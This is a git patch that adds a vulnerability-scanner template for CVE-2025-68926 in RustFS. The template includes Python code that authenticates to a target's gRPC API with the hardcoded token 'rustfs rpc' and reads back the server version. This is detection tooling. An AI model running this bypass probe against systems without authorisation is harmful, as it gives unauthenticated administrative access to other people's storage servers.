From 37c92114fcf95b694767813f2189b23db0e51f6f Mon Sep 17 00:00:00 2001 From: Valentin Lobstein Date: Mon, 5 Jan 2026 00:56:33 +0100 Subject: [PATCH 1/2] feat: add CVE-2025-68926 - RustFS Hardcoded gRPC Token --- code/cves/2025/CVE-2025-68926.yaml | 88 ++++++++++++++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 code/cves/2025/CVE-2025-68926.yaml diff --git a/code/cves/2025/CVE-2025-68926.yaml b/code/cves/2025/CVE-2025-68926.yaml new file mode 100644 index 00000000000..f6de6d95584 --- /dev/null +++ b/code/cves/2025/CVE-2025-68926.yaml @@ -0,0 +1,88 @@ +id: CVE-2025-68926 + +info: + name: RustFS < 1.0.0-alpha.77 - Hardcoded gRPC Authentication Token + author: Chocapikk,bilisheep + severity: critical + description: | + RustFS before 1.0.0-alpha.77 uses a hardcoded gRPC authentication token "rustfs rpc" that cannot be changed without recompiling. + This allows unauthenticated remote attackers to gain full administrative access to the gRPC API. + impact: | + Full administrative access to RustFS including reading, writing, and deleting all stored data. + remediation: | + Upgrade to RustFS 1.0.0-alpha.77 or later. + reference: + - https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2025-68926 + cwe-id: CWE-798 + metadata: + verified: true + max-request: 1 + vendor: rustfs + product: rustfs + tags: cve,cve2025,rustfs,grpc,auth-bypass,hardcoded-credentials + +variables: + HOST: "{{Host}}" + PORT: "{{Port}}" + +code: + - engine: + - py + - python3 + + source: | + import socket, os, re + from h2.connection import H2Connection + from h2.config import H2Configuration + from h2.events import DataReceived, TrailersReceived, StreamEnded + + host, port = os.getenv('HOST'), int(os.getenv('PORT')) + sock = socket.create_connection((host, port), timeout=10) + sock.settimeout(5) + + conn = H2Connection(H2Configuration(client_side=True)) + conn.initiate_connection() + sock.sendall(conn.data_to_send()) + + sid = conn.get_next_available_stream_id() + hdrs = [(':method','POST'),(':scheme','http'),(':authority',f'{host}:{port}'), + (':path','/node_service.NodeService/ServerInfo'), + ('content-type','application/grpc'),('authorization','rustfs rpc'),('te','trailers')] + conn.send_headers(sid, hdrs, end_stream=False) + conn.send_data(sid, b'\x00\x00\x00\x00\x00', end_stream=True) + sock.sendall(conn.data_to_send()) + + body, status = b'', None + while True: + data = sock.recv(65535) + if not data: break + for e in conn.receive_data(data): + if isinstance(e, DataReceived): + body += e.data + conn.acknowledge_received_data(e.flow_controlled_length, e.stream_id) + elif isinstance(e, TrailersReceived): + status = dict(e.headers).get(b'grpc-status', b'').decode() + elif isinstance(e, StreamEnded): break + else: sock.sendall(conn.data_to_send()); continue + break + sock.close() + + if status == '0' and len(body) > 5: + m = re.search(rb'(\d+\.\d+\.\d+-alpha\.\d+)', body) + print(m.group(1).decode() if m else 'grpc-auth-bypass') + + matchers: + - type: dsl + dsl: + - 'contains(response, "alpha") || contains(response, "grpc-auth-bypass")' + + extractors: + - type: regex + name: version + regex: + - "(\\d+\\.\\d+\\.\\d+-alpha\\.\\d+|grpc-auth-bypass)" +# digest: 4a0a00473045022044ca1a38c373dfea00acc161c68fc55ca9f4e3d49383834f03b824e1f78e2acb0221008e3884a7f2e2788c0648838ad0e5d524f2f1471f1381c9fc6f8b9c418c533134:3ebfdc4ea1f37636a2ce428217ae7f8d \ No newline at end of file From 38ae0d7e5cff56b3cf6eb32d87aea265a5faaeb4 Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Mon, 5 Jan 2026 13:50:28 +0530 Subject: [PATCH 2/2] Update CVE-2025-68926.yaml --- code/cves/2025/CVE-2025-68926.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/code/cves/2025/CVE-2025-68926.yaml b/code/cves/2025/CVE-2025-68926.yaml index f6de6d95584..39e0857123c 100644 --- a/code/cves/2025/CVE-2025-68926.yaml +++ b/code/cves/2025/CVE-2025-68926.yaml @@ -5,14 +5,14 @@ info: author: Chocapikk,bilisheep severity: critical description: | - RustFS before 1.0.0-alpha.77 uses a hardcoded gRPC authentication token "rustfs rpc" that cannot be changed without recompiling. - This allows unauthenticated remote attackers to gain full administrative access to the gRPC API. + RustFS before 1.0.0-alpha.77 used a hardcoded gRPC authentication token "rustfs rpc" that could not be changed without recompiling and this allowed unauthenticated remote attackers to gain full administrative access to the gRPC API. impact: | Full administrative access to RustFS including reading, writing, and deleting all stored data. remediation: | Upgrade to RustFS 1.0.0-alpha.77 or later. reference: - https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj + - https://nvd.nist.gov/vuln/detail/CVE-2025-68926 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -23,7 +23,7 @@ info: max-request: 1 vendor: rustfs product: rustfs - tags: cve,cve2025,rustfs,grpc,auth-bypass,hardcoded-credentials + tags: cve,cve2025,rustfs,grpc,auth-bypass,code variables: HOST: "{{Host}}" @@ -85,4 +85,4 @@ code: name: version regex: - "(\\d+\\.\\d+\\.\\d+-alpha\\.\\d+|grpc-auth-bypass)" -# digest: 4a0a00473045022044ca1a38c373dfea00acc161c68fc55ca9f4e3d49383834f03b824e1f78e2acb0221008e3884a7f2e2788c0648838ad0e5d524f2f1471f1381c9fc6f8b9c418c533134:3ebfdc4ea1f37636a2ce428217ae7f8d \ No newline at end of file +# digest: 4a0a00473045022015cbdaff0a72de87b3a5238a9133b95eac29d3445d27d1deb3b696b71739d4540221009846fa120f8cff6e1279f73606d6598fa0047298a7f9f01f29663ac5a6795925:2592222ea8b5b5922b8de61fd7ebe9f8 \ No newline at end of file